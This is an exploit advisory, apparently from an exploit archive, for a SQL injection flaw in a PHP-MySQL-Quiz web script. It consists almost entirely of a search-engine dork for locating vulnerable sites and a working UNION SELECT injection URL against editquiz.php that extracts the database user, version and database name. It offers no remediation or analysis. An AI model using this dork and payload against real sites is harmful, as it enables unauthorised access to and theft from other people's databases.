id: 10537
date: 12/31/2009
title: PHP-MySQL-Quiz SQL Injection Vulnerability
author: Hussin X
cves: 

==========================================
PHP-MySQL-Quiz SQL Injection Vulnerability
==========================================

##########################################################
#    HomE script : http://www.widgetmonkey.com/
 
#    Download    : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881
 
#    DorK : inurl:quizinfo.php
 
 
 
Exploit:
 
http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
 



#  0day.today [2023-03-22]  #